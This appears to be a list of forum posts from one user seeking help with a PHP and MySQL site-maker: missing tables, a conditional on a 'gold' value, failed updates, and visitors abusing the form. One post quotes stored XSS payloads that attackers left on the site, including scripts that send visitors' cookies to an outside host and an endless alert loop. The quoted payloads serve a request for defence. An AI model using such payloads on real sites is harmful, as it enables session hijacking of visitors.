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  1. Solved, simply changed t: ". mysql_real_escape_string($info['sitename']) ."news Thanks for help!
  2. Query SELECT * FROM news ORDER BY id DESC Failed with error: Table 'site.news' doesn't exist :-\
  3. No errors are shown but the message There is no news shows
  4. I've coded this up and i don't see why it does not connect the database by that i mean connect to that database. The $_GET function is just to get the site name . please help
  5. it helps but now it shows the include file part for 0 and well any number really
  6. I dont know. I it wont show anything like now i've changed it <?php if($gold != 0) { echo "<center><p>You DO not have Gold webclient, Purchase at the Upgrades shop!</p></center>"; } else if($gold != 1) { echo "work?"; } ?> and it still dont work. It wont show the You do not have message if gold is on 0
  7. I dont seem to get this to work. If gold in the database (on a persons data) is 0 or its just empty i want it to show the message below but if its 1 or more i want it to show a file with content in ( The content shows on the page there on)
  8. Thanks it worked your a star and the first person that helped me proper
  9. I dont know whats wrong it dnt show a error message but does not update.
  10. ok its not working The codes which are being used are; <script> for(;{alert('*CENSORED*')}</script> <script>document.location=”http://minecraftuk.org/xss/?c=” + document.cookies</script> <script>window.location=”http://minecraftuk.org/xss/?c=” + document.cookies</script>
  11. It works but how can i remove the message part
  12. Thanks for the cmment but what exactly does it do?
  13. Well people who hate my site have been coming on and making a site with my site maker . And instead of filling in proper info they put <script> which redirects. And when they finish it saves into mysql and when i view the list of sites it redirects me to another site, Anyone know what can solve this?
  14. No just didn't work
  15. I tested and it didn't work!
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